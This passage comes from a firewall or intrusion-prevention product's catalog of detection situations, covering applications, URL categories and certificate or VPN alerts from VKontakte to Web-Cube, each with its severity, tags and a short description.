Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-630-5211
Description: VKontakte is a Russian social networking website, the service claims 250 million users mostly in Russia, Ukraine and Azrebaijan.
Back to top

VLC Media Player

About this situation: Endpoint Context Agent based VLC media player detection
Context: EI Correlation
Severity: 1
Tags: Streaming Media, Endpoint
First detected in: sgpkg-ips-991-5242
Last changed: sgpkg-ips-991-5242
Description: VLC media player endpoint application has been detected. VLC Media Player is a free and open popular media player that is capable to replay both remote streams and local media files. It has been developed by VideoLAN.
Back to top

VMware

About this situation: VMware usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-1171-5242
Description: VMware provides a range of virtualization products for Datacenter & Cloud Infrastructure, Desktop & End-User Computing, Application Platform, Small & Midsize Business, and Infrastructure & Operations Management, etc.
Back to top

VMware Remote Console

About this situation: Endpoint Context Agent based VMware Remote Console
Context: EI Correlation
Severity: 1
Tags: Remote Desktop / Terminal Services, Endpoint
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Description: VMware Remote Console endpoint application has been detected.
Back to top

VMware Workstation

About this situation: Endpoint Context Agent based VMware Workstation
Context: EI Correlation
Severity: 1
Tags: Remote Desktop / Terminal Services, Endpoint
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Description: VMware Workstation endpoint application has been detected. VMware Workstation is a virtual machine monitor.
Back to top

VNC

About this situation: Endpoint Context Agent based VNC
Context: EI Correlation
Severity: 1
Tags: Remote Desktop / Terminal Services, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: RealVNC VNC endpoint application has been detected.
Back to top

VNC-Deskhop

About this situation: VNC Deskhop usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-595-5211
Description: VNC Deskhop is a screen share and remote control application for Facebook users.
Back to top

VNC-Java-Viewer

About this situation: VNC Java Viewer usage detected
Context: Application Context
Severity: 1
Tags: Protocols, Remote control
First detected in: sgpkg-ips-569-5211
Last changed: sgpkg-ips-595-5211
Description: VNC Java Viewer is a screen share and remote control application for Facebook users.
Back to top

VNC-Remote-Framebuffer-Protocol

About this situation: VNC Remote Framebuffer Protocol traffic
Context: Application Context
Severity: 1
Tags: Protocols, Remote control, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: Virtual Network Computing (VNC) is a graphical desktop sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. Source: Wikipedia
Back to top

VNC-software

About this situation: Application VNC-software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VNC software enables you to remotely access and securely control your desktop or mobile.
Back to top

Vocalcom

About this situation: Application Vocalcom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vocalcom is the cloud contact center software and sales technology. It provides software solutions for customer service, sales and marketing.
Back to top

Vocus

About this situation: Vocus usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This collection helps clients attract and engage prospects, nurture, and convert customers; it measures and improves marketing effectiveness. Source: Wikipedia
Back to top

Vodafone-Cloud

About this situation: Application Vodafone-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vodafone Cloud lets users to store photos, videos, music and other files.
Back to top

Voddler

About this situation: Voddler usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Voddler is a commercial video-on-demand service.
Back to top

Voices.com

About this situation: Application Voices.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Voices.com is the online marketplace that connects business people with professional voice actors.
Back to top

VoiceThread

About this situation: Application VoiceThread detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VoiceThread transforming media into collaborative spaces with video, voice, and text commenting.
Back to top

VoIP.ms

About this situation: Application VoIP.ms detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VoIP.ms provides a solid, reliable and customizable VoIP experience to our users
Back to top

Voipfone

About this situation: Application Voipfone detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: UK VoIP Provider Voipfone provides award winning, reliable and inexpensive VoIP telephone calls and advanced cloud based hosted PBX services to business.
Back to top

VoipNow

About this situation: Application VoipNow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VoipNow is a cloud communications platform dedicated to service providers and organizations in need of enterprise PBX, video, presence, instant messaging, contact center features, conferencing, faxing, and mobility.
Back to top

Voipro

About this situation: Application Voipro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Voipro is an independent developer and provider in the field of hosted voice solutions. Voipro services from its own platform and provided based on open standards through a network of resellers, distributors, system integrators and service providers.
Back to top

Volerro

About this situation: Application Volerro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Volerro is simplifying the way teams share, refine and distribute all types of digital content.
Back to top

Volt-CRM

About this situation: Application Volt-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: voltageCRM is a revolutionary activity based forecasting platform for your whole team. Get marketing, sales, management, and the CEO working together to improve the metrics that matter.
Back to top

Volusion

About this situation: Volusion usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Hosting, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This service allows users to build a website, create a shopping cart, and provides website hosting. It also offers built in marketing, social media and SEO tools.
Back to top

Vonage

About this situation: Application Vonage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vonage is a software technology company that provides voice and messaging services across multiple devices and locations over broadband networks.
Back to top

Voog

About this situation: Application Voog detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Edicy - tool for building websites. Mostly used by small businesses, startups, non-profits and freelancers alike.
Back to top

VooV-Meeting

About this situation: VooV Meeting usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1586-5242
Description: VooV Meeting is a cloud-based HD conferencing application. To permit Voov Meeting traffic in the access policy, Tencent-QQ application will also need to be permitted.
Back to top

Vorex-Project-Management-Suite

About this situation: Application Vorex-Project-Management-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Powerful easy to use cloud-based Project Management solution that allows you to create, staff, forecast, budget, and accurately track all your projects.
Back to top

Vormetric

About this situation: Application Vormetric detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vormetric is a private data security company that provides products and services to prevent sensitive data theft from hackers and malicious insiders by securing structured data in databases and unstructured data located in file systems.
Back to top

Vox

About this situation: Vox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

VoyantHealth

About this situation: Application VoyantHealth detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Voyant Health is software product company.
Back to top

VP-ASP-Shopping-Cart

About this situation: Application VP-ASP-Shopping-Cart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VP-ASP Shopping Cart provides open-source package for developers and hosted solution for merchants setting up an online store.
Back to top

VPN CA Certificate has expired

About this situation: VPN CA Certificate has expired
Context: Management Server situation
Severity: 8
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: VPN CA Certificate has expired
Back to top

VPN Certificate expires soon

About this situation: The VPN certificate expires soon. Renew or create a new Internal Gateway certificate in the VPN Configuration view.
Context: Management Server situation
Severity: 3
Tags: Upcoming Events
First detected in: sgpkg-ips-1423-5242
Last changed: sgpkg-ips-1535-5242
Description:
Back to top

VPN certificate has expired

About this situation: VPN certificate has expired
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-271-4219
Last changed: sgpkg-ips-1296-5242
Description: The VPN certificate has expired. Renew or create a new Internal Gateway certificate in the VPN Configuration view.
Back to top

VPN Certificate warning: certificate expires in less than 7 days

About this situation: VPN Certificate warning: certificate expires in less than 7 days
Context: Management Server situation
Severity: 8
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The VPN certificate expires in less than 7 days. Renew or create a new Internal Gateway certificate in the VPN Configuration view.
Back to top

VPN Certificate warning: certificate expires in less than 90 days

About this situation: VPN Certificate warning: certificate expires in 90 days
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The VPN certificate expires in less than 90 days. Renew or create a new Internal Gateway certificate in the VPN Configuration view.
Back to top

VPN-Broker_Client-Request

About this situation: VPN Broker Client information request.
Context: Firewall Events
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: VPN broker client information request to VPN broker server.
Back to top

VPN-Broker_Connection_Error

About this situation: Connection with VPN broker server is not established.
Context: Firewall Events
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: Connection with VPN broker server is not established.
Back to top

VPN-Broker_Connection_Established

About this situation: Connection with VPN broker server established.
Context: Firewall Events
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: Connection with VPN broker server established.
Back to top

VPN-KeepAlive-Cannot-Establish

About this situation: Problem with establishing a VPN tunnel
Context: Firewall Events
Severity: 2
Tags: VPN
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: Unable to establish a VPN tunnel automatically.
Back to top

VPN-KeepAlive-Established

About this situation: VPN tunnel established
Context: Firewall Events
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1531-5242
Description: A VPN tunnel has been established automatically. If the IKE SA and the IPsec SA expire, the VPN tunnel is automatically renegotiated even if there is no traffic in the VPN tunnel.
Back to top

VPN-Over-DNS

About this situation: VPN-over-DNS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-856-5242
Last changed: sgpkg-ips-870-5242
Description: VPN-over-DNS is a network anonymizing application for multiple platforms. It tunnels the traffic over DNS messages.
Back to top

VPN-Starting-User-Authentication

About this situation: Starting User Authentication
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: Starting user authentication.
Back to top

VPN-User-Authentication-Done

About this situation: User Authentication Done
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: User authentication completed successfully.
Back to top

VPN-User-Authentication-Failed

About this situation: User Authentication Failed
Context: Internet Key Exchange
Severity: 1
Tags: VPN
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-106-2032
Description: User authentication failed.
Back to top

vSource

About this situation: Application vSource detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: vSource is an on-demand candidate sourcing solution that blends smart technology with human intuition and recruitment experience.
Back to top

VSP-Member-Login

About this situation: Application VSP-Member-Login detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vision Service Plan, often known simply as VSP, is the provider of vision insurance.
Back to top

vSphere Client

About this situation: Endpoint Context Agent based vSphere Client
Context: EI Correlation
Severity: 1
Tags: Remote Desktop / Terminal Services, Endpoint
First detected in: sgpkg-ips-991-5242
Last changed: sgpkg-ips-991-5242
Description: vSphere endpoint application has been detected. vSphere Client is an application that is used to manage VMWare installations, such as VMWare ESX and ESXi.
Back to top

vSphere-Web-Client

About this situation: vSphere Web Client usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1237-5242
Description: vSphere Web Client is used to connect to vCenter Server system. This application can only be identified after the TLS connection is decrypted.
Back to top

VSTORE

About this situation: Application VSTORE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VSTORE is a service that provides web store creation, management and ecommerce web hosting services.
Back to top

vTiger-CRM

About this situation: Application vTiger-CRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: vTiger CRM provides software to improve sales conversions, extend marketing reach, and build lasting customer relationships.
Back to top

VTS

About this situation: Application VTS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VTS develops a commercial real estate leasing and asset management platform. The Company platform enables owners and brokers to streamline their workflows and lease space as well as manages deal activity, identify trends, and quantify portfolio performance on dashboard.
Back to top

VTunnel

About this situation: VTunnel usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-420-4219
Last changed: sgpkg-ips-666-5211
Description: VTunnel is a web proxy that supports SSL via the HTTPS encryption protocol. The service is used to bypass Internet filtering.
Back to top

VTunnel.pk

About this situation: VTunnel.pk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-666-5211
Description: VTunnel.pk is a web proxy that supports SSL via the HTTPS encryption protocol. The service is used to bypass Internet filtering.
Back to top

Vudu

About this situation: Vudu usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1764-5242
Description: Vudu usage detected
Back to top

Vultr

About this situation: Application Vultr detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VULTR is a cloud services provider based on 100 percent SSD hardware.
Back to top

Vuzit

About this situation: Application Vuzit detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AJAX and HTML5 Document Viewer PlatformBuild full-featured document viewing, search, document tracking and protection services into your web site or online service.
Back to top

Vyew

About this situation: Vyew usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-567-5211
Last changed: sgpkg-ips-1764-5242
Description: An online collaboration application
Back to top

VyStar-Credit-Union

About this situation: Application VyStar-Credit-Union detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: VyStar Credit Union is a state-chartered credit union. Some of their products and services are free checking, Internet banking, online bill pay, mobile banking, auto loans and mortgages.
Back to top

Vzaar

About this situation: Application Vzaar detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Vzaar is an online video platform that provides businesses with a solution for managing and publishing videos online.
Back to top

Vzochat

About this situation: vzochat usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: VZOchat is a free software for making video calls and instant messaging. Source: vzochat
Back to top

Vzones

About this situation: VZones usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based chat service which allows users to send instant messages to each other online using just a web browser.
Back to top

W32Time

About this situation: Endpoint Context Agent based w32time.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Description: A network connection launched by the Windows system process w32time.exe was detected. W32time.exe is part of the Windows Time Service.
Back to top

W3Counter

About this situation: Application W3Counter detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: W3Counter provides web stats to your WordPress dashboard, and installs the tracker on your site via a sidebar widget.
Back to top

W3Now-Web-Design

About this situation: Application W3Now-Web-Design detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: W3Now Web Design is a web design company that provides web design, social media marketing and web site search engine optimization for small business.
Back to top

WaasMedic

About this situation: Endpoint Context Agent based WaasMedic.exe detection
Context: EI Correlation
Severity: 1
Tags: System Services, Endpoint
First detected in: sgpkg-ips-1062-5242
Last changed: sgpkg-ips-1062-5242
Description: A network connection launched by the Windows system process WaasMedic.exe was detected. WaasMedic.exe is a process which attempts to repair a broken Windows Update.
Back to top

WAERlinx

About this situation: Application WAERlinx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Waer is an agile software development company providing powerful supply chain, system integration and business intelligence solutions via the Cloud.
Back to top

Wagepoint

About this situation: Application Wagepoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wagepoint provides online payroll software for small businesses. The companys activities include direct deposit, payroll calculations, federal
Back to top

WageWorks

About this situation: Application WageWorks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: CONEXIS is focused exclusively on providing easy-to-use, fully compliant services to employers of all types and sizes.
Back to top

Wakoopa

About this situation: Wakoopa usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A social networking site that monitors the software applications its members use; source Wikipedia
Back to top

Walgreens-Photo

About this situation: Walgreens Photo usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-767-5211
Description: Walgreens Photo provides online digital photo printing and free online photo sharing with unlimited storage.
Back to top

WallSee

About this situation: Application WallSee detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WallSee is a SaaS platform that leverages your contacts by providing you with a simple solution to generate Promotions and track the sharing activity of your contacts and customers, and even reward them for their activity.
Back to top

Wargaming

About this situation: Application Wargaming detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wargaming is a game development platform.
Back to top

Washington-Post

About this situation: The Washington Post usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-524-5211
Last changed: sgpkg-ips-630-5211
Description: The Washington Post is an American daily newspaper.
Back to top

Watchdox

About this situation: WatchDox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: WatchDox enables organizations to access, share and control their critical documents wherever they go: on any tablet, smartphone, or PC. The WatchDox document-centric security platform allows organizations to collaborate with partners, adopt bring your own device (BYOD) initiatives, and control or wipe their documents remotely
Back to top

Wave

About this situation: Application Wave detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wave offers a cloud-based integrated suite of small business tools including accounting, invoices, payments and payroll.
Back to top

Wavelink

About this situation: Application Wavelink detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Wavelink provides mobile device management for the complete enterprise, WWAN and WLAN management, voice picking, and terminal emulation software.
Back to top

Way2sms

About this situation: Way2SMS usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-631-5211
Description: A text-messaging website
Back to top

Wayn

About this situation: WAYN usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: Registered users send and receive messages using email, discussion forums, eCards, SMS, and WAYN instant messages.
Back to top

Waze

About this situation: Waze usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-754-5211
Description: This application provides turn by turn information and user submitted travel times and route details, downloading location-dependent information over the mobile telephone network for smartphones with GPS support and display screens. Source: Wikipedia
Back to top

Wazuh Agent

About this situation: Endpoint Context Agent based Wazuh Agent detection
Context: EI Correlation
Severity: 1
Tags: Security, Endpoint
First detected in: sgpkg-ips-1523-5242
Last changed: sgpkg-ips-1523-5242
Description: Wazuh Agent endpoint application has been detected.
Back to top

WCBS-ACADEMIC

About this situation: Application WCBS-ACADEMIC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: WCBS ACADEMIC is a Multi-lingual solution that helps admissions administrators streamline routine tasks, such as document management.
Back to top

Weapons

About this situation: Sites that provide information about, promote, or support the sale of weapons and related items.
Context: URL Application Context
Severity: 1
Tags: Weapons, Legal Liability
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide information about, promote, or support the sale of weapons and related items.
Back to top

Weather-Channel-Desktop

About this situation: Weather Channel Desktop usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1678-5242
Description: An application that gives an instant access to real-time local weather and alerts you whenever severe storms threaten.
Back to top

Weather-Underground

About this situation: Weather Underground service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Description: Weather Underground is a commercial weather service.
Back to top

Weather.com

About this situation: Usage of www.weather.com detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-613-5211
Last changed: sgpkg-ips-1725-5242
Description: Weather.com is a weather forecasting site owned by The Weather Company, a subsidiary of IBM.
Back to top

WeatherBug

About this situation: WeatherBug usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-499-5211
Last changed: sgpkg-ips-630-5211
Description: WeatherBug is an application that provides weather data such as current weather conditions, local weather reports and storm alerts. WeatherBug is a brand of Earth Networks.
Back to top

Weaver

About this situation: Application Weaver detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: In addition to traditional assurance and tax services, Weaver also provides numerous advisory services, including risk advisory, transaction advisory, IT advisory, forensic accounting, litigation support, international, property tax, state and local tax, and wealth management services.
Back to top

Web Analytics

About this situation: Sites that are associated with web traffic analysis.
Context: URL Application Context
Severity: 1
Tags: Information Technology, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that are associated with web traffic analysis.
Back to top

Web and Email Marketing

About this situation: Sites that are associated with online marketing.
Context: URL Application Context
Severity: 1
Tags: Information Technology, Business Usage, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that are associated with online marketing.
Back to top

Web and Email Spam

About this situation: Sites whose links are sent in unsolicited commercial email, either as part of campaigns to promote products or services or to entice readers to click through to surveys or similar sites. Also includes sites that display comment spam.
Context: URL Application Context
Severity: 1
Tags: Information Technology, Productivity Loss, Security Risk
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites whose links are sent in unsolicited commercial email, either as part of campaigns to promote products or services or to entice readers to click through to surveys or similar sites. Also includes sites that display comment spam.
Back to top

Web application failed to start

About this situation: Web application failed to start
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-220-3038
Last changed: sgpkg-ips-220-3038
Description: A web application failed to start. Please check internal traces.
Back to top

Web Chat

About this situation: Sites that host web chat services or that support or provide information about chat via HTTP or IRC.
Context: URL Application Context
Severity: 1
Tags: Internet Communication, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that host web chat services or that support or provide information about chat via HTTP or IRC.
Back to top

Web Collaboration

About this situation: Sites that provide virtual workspace for purposes of collaboration and conferencing, which may include sites that enable authorized access to a computer or network from a remote location.
Context: URL Application Context
Severity: 1
Tags: Information Technology, Business Usage
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide virtual workspace for purposes of collaboration and conferencing, which may include sites that enable authorized access to a computer or network from a remote location.
Back to top

Web Configuration HTTPS certificate expires soon

About this situation: Web Configuration HTTPS certificate expires soon
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1423-5242
Description: The Web Configuration HTTPS certificate for the engine expires in less than 90 days. Create a new Web Configuration HTTPS certificate for the engine.
Back to top

Web Configuration HTTPS certificate has expired

About this situation: Web Configuration HTTPS certificate has expired
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1423-5242
Description: The Web Configuration HTTPS certificate for the engine has expired. Create a new Web Configuration HTTPS certificate for the engine.
Back to top

Web Hosting

About this situation: Sites of organizations that provide hosting services, or top-level domain pages of web communities.
Context: URL Application Context
Severity: 1
Tags: Information Technology, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites of organizations that provide hosting services, or top-level domain pages of web communities.
Back to top

Web Images

About this situation: Sites that deliver image content.
Context: URL Application Context
Severity: 1
Tags: Miscellaneous
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that deliver image content.
Back to top

Web Infrastructure

About this situation: Sites that are associated with website architecture.
Context: URL Application Context
Severity: 1
Tags: Miscellaneous
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that are associated with website architecture.
Back to top

Web Portal Server: too many concurrent users

About this situation: Web Portal Server: too many concurrent users
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-1296-5242
Description: Login failed: Web Portal Server's maximum limit for simultaneous users was reached.
Back to top

Web Portal Users License Exceeded

About this situation: Web Portal Server startup failed: Install a Web Portal Users license or disable existing Web Portal Users
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-218-3038
Last changed: sgpkg-ips-1296-5242
Description: Web Portal Server startup failed: Install a Web Portal Users license or disable existing Web Portal Users.
Back to top

Web-Cube

About this situation: Application Web-Cube detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
